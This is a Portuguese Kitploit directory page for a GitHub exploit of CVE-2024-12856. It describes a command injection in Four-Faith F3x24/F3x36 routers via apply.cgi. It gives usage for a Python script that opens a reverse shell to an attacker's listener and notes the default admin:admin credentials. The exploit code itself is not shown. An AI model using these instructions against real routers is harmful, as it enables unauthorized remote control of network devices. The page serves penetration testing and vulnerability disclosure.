Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-12856 — Um exploit para roteadores Four-Faith para obter um reverse shell | Kitploit
Ferramentas/GitHubGitHub/nu113d/cve-2024-12856
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubnu113d/cve-2024-12856

CVE-2024-12856

Um exploit para roteadores Four-Faith para obter um reverse shell

Ver Repositório
37há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-12856

Este é um exploit para os modelos de roteadores Four-Faith F3x24 e F3x36 para obter um reverse shell.

"Os modelos de roteadores Four-Faith F3x24 e F3x36 são afetados por uma vulnerabilidade de injeção de comandos do sistema operacional (SO). Pelo menos a versão de firmware 2.0 permite que atacantes autenticados e remotos executem comandos arbitrários do SO via HTTP ao modificar o horário do sistema por meio do apply.cgi. Além disso, esta versão de firmware possui credenciais padrão que, se não forem alteradas, efetivamente transformariam esta vulnerabilidade em um problema de execução remota de comandos do SO sem autenticação."

Fonte: nist.gov

Este script é baseado em um payload observado pela VulnCheck

Como usar

Antes de executar o exploit, inicie um servidor TCP na sua máquina.
Em seguida, execute

python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT

Onde

  • RHOST é o endereço IP remoto. Você também pode adicionar um domínio.
  • LHOST é o IP do seu servidor TCP na sua máquina.
  • LPORT é a porta do seu servidor TCP.
  • USERNAME e PASSWORD são as credenciais do roteador. O padrão é admin:admin.
  • RPORT é a porta remota do roteador. O padrão é 80.
  • Aviso legal

    Certifique-se de usar este exploit apenas para testes e em ambientes autorizados.

    Nunca o use para fins maliciosos.

    Baixar ferramenta